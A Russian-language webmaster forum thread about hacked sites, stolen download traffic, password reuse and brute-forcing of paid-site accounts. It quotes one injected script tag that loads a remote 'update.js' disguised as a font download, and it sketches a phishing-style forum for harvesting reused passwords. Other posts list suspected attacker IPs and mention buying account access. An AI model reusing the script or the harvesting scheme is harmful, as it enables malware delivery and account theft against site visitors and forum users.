[Leatherdyke]

Сообщение от slavegirl Столкнулась недавно с очень наглым и циничным способом воровства файлов

Если пару дней идут одни доменные, то нужно обязательно стучать в поддержку ФО
Ошибки бывают, но они не носят систкматический характер, а вот если это вошло в систему, сравниваем ссылки. Ну а там кто на что горазд, если есть возможности... ("можно и по IP" вычислить ) Ну а потом бить, возможно даже ногами

[Leatherdyke]

Но у меня взломщик попался еще наглее, чем у Рабыни Этот взломал не только сайт, но и мою почту. Перешел в вебмастерскую гугла, изменил гео на Японию. Добавил себя админом на сайт и начал сливать трафик Долго это безобразие не продлилось, всего окола часа. Но сама наглость меня поразила до глубины души. Я захожу в панель гугла, а там радостная весть, у сайта появился еще один хозяин

[vitali]

У меня когда то на одном из сайтов к админке стоял стандартный пароль, который я использовал для регистрации на других сайтах, так кто то подобрал его, зашел в админку и поставил скрипт
<script src="http://34.208.136.102/update.js"></script>
Он делает отдельную страницу на главной сайта где пишет что хром не поддерживает шрифты сайта и предлагают скачать шрифт (понятно что это никакой не шрифт).
Этот скрипт я быстро убрал, но вот потом гугл отметил сайт как вредоносный и пришлось возится чтобы разблокировать его.

НИКОГДА не используйте один пароль для админки и регистрации на других сайтах.

[slavegirl]

Сообщение от Leatherdyke Если пару дней идут одни доменные, то нужно обязательно стучать в поддержку ФО

Это всё просто, когда в аккаунте подключены 1-2 сайта. А когда таких сайтов пара десятков, как мне уследить, что происходит на каждом из них? Особенно, если блог очень старый и на нём всегда всё стабильно работало...


Спрашивала у техподдержки, можно ли как-то забрать деньги у этого "везунчика" и передать их мне (хотя бы то, что он не успел ещё вывести), или в крайнем случае забанить его и дать мне его почту, чтобы я могла написать ему "пару ласковых". Сказали, что никаких правил он не нарушил и вся ответственность за безопасность моих сайтов лежит исключительно на мне. Всё, что они могут обеспечить, это сохранность моего аккаунта на HitFile и защиту от взлома, всё что за его пределами - на это они повлиять не в состоянии.

Блин, столько пунктов в этих правилах и не одного по моему случаю... Даже этот не подходит:


http://hitfile.net/rules/terms





Хорошо, что он ещё не догадался какой-нибудь анонимайзер для ссылок на javascript приделать, чтобы не отображались доменные продажи. Тогда бы я ещё полгода ни о чём бы не догадывалась. 100% какой-то неопытный новичок попался.

Сообщение от Leatherdyke "можно и по IP" вычислить. Ну а потом бить, возможно даже ногами.

Вот его IP-адреса (скорее всего, какой-нибудь немецкий VPN):

79.231.145.147
79.231.148.183
79.231.149.171

Можете проверить, не сканирует ли он и ваши блоги тоже.

[Rino]

Сообщение от slavegirl дать мне его почту, чтобы я могла написать ему "пару ласковых"

ох как его это расстроит

Сообщение от slavegirl Хорошо, что он ещё не догадался какой-нибудь анонимайзер для ссылок на javascript приделать, чтобы не отображались доменные продажи. Тогда бы я ещё полгода ни о чём бы не догадывалась

молодец, подсказала, теперь не просто догадывается, а знает

[jogh]

Сообщение от slavegirl Админ моего сервера показал мне журналы попыток доступа, там куча вот таких записей по каждому из сайтов:

сегодня это обычная история даже для сайтов не на вордпресе, редиректить wp-login и другие популярные для скана места на 404 html (или ещё куда подальше), не использовать для админа имя admin, не использовать плагины wordpress, не использовать wordpress...
а вообще парень хорош - очень аккуратный, школьника сразу бы стало заметно, дел наворотил-бы
он мог и не взламывать лично, а купить логи или доступ, видел подобные объявления, обычно для проставления вечных ссылок, слива трафика и т.п.

[slavegirl]

Сообщение от ID 185867 капец муславе, даже не знаю с чего начать, да и не надо... вы ноль целых, ноль десятых в парольщиках и как делают пассы к платнику, вы сами похоже не одного пасса не заказали у парольщиков... все познания о бруте у вас как у этого, которые кидал на мелочь и плодил мультиаки на серче, забыл его ник, вспомните не пишите здесь ибо это офтоп всё... без обид вы ноль-ноль-ноль в том о чем написали. и вы ноль как работают парольщики ибо такую шдяпу пишите аж смешно... брутфорс

ID 185867, да мне уже объяснили только что в личке, каким образом вы воруете пароли. На самом деле очень примитивный и медленный способ, мы его в универе изучали по компьютерной безопасности:





Могу дать небольшую подсказку. Вместо того, чтобы сутками напролёт перебирать все возможные пароли (по словарю или без) на всяких Планетах и Интпорнах, тем самым блокируя работу постеров, которые не могут из-за вас залогиниться, можете сделать какой-нибудь публичный адалт-форум с открытой регистрацией и сохранять пользовательские данные в базе данных в незашифрованном виде.

Постеры сами предоставят нужные пароли и они в 99% случаев подойдут и к Планете, и к Интпорну и ещё к тысяче других форумов. У Вас будет примерно полгода-год, пока форум не заподозрят в фишинге и браузеры перестанут на него впускать.

Так что, скорее всего, это Вы "ноль-ноль-ноль" в том, что Вы написали. Но не обижайтесь, пожалуйста!


В то же время, крайне настоятельно рекомендую постерам использовать на разных форумах разные пароли, чтобы защититься от подобного вида угона аккаунтов.

[ID 185867]

Сообщение от slavegirl ID 185867, да мне уже объяснили

че объяснили? если о пассах к платникам и пассах к форумам, вообще используется разный софт и даже к форумам для каждого свой софт пишется, для платников (платных-п0рн0 сайтов) также у каждого свой софт и пишется он на заказ, услышала где-то чето, толком не знаешь ниче и давай умничать... купи хоть пару пассов себе на платник, пообщайся с паролеводами, может в общих чертах че узнаешь, хотя скорее всего паролевод пошлёт на три буквы с такими вопросами.
вы как ерема, ему про мешок, он про картошку... с чего базарга то начилась? с тогочто типа вот платники, кардеры... я вам сказал там в 99% обычным брутом обходятся для входа в мемберку, оставшийся 1% это не для меня... брут тоже бывает разный, софт тоже разный, способы тоже разные.
у вас в голове один брутофорс застрял, прога для школьников.

и я лично ниче не ворую, как вы пишите, я сам покупаю доступы на платники и акаунты на форумы, у разных людей... у вас даже в этом такая привычка проявить типа умничание, хотя вообще не в теме, что и как.

[slavegirl]

Сообщение от ID 185867 с тогочто типа вот платники, кардеры... я вам сказал там в 99% обычным брутом обходятся для входа в мемберку, оставшийся 1% это не для меня...

ID 185867, ага. Убеждайте себя в этом и дальше. По статистике на первом месте у кардеров как раз продажа доступа к адалт-платникам:


https://books.google.com/books?id=zP...page&q&f=false

Сообщение от ID 185867 купи хоть пару пассов себе на платник, пообщайся с паролеводами, может в общих чертах че узнаешь

Именно по вышеописанной причине я стараюсь и не связываться с подобным. Все подписки на платники я покупаю без помощи сомнительных посредников (так спится намного спокойнее).

[ID 185867]

Сообщение от slavegirl По статистике на первом месте у кардеров как раз продажа доступа к адалт-платникам:

кардеры ещё и ведут статистику? и кому они статистику докладывают? вам? МВД?
просто кардеры больше всего горят из-за мелочи и болтунов, так то это контигент очень не общительный и даже при бошьшом желании вы сто раз нарветесь на кидал, прежде чем найдете того, кого ищете... славе у вас че головка маковая? до вас не доходит , что тема каржа вообще сама по себе такая палевная, что о ней писать даже стороннему нубу лучше не надо, ибо привлечешь на себя интерес структур, а вы тут разорались о карже...
единственное что я вам говорю, что парольщики и люди делающие пассы на платники это не кардеры, ключевое слово подчеркну, делающие пассы на платники....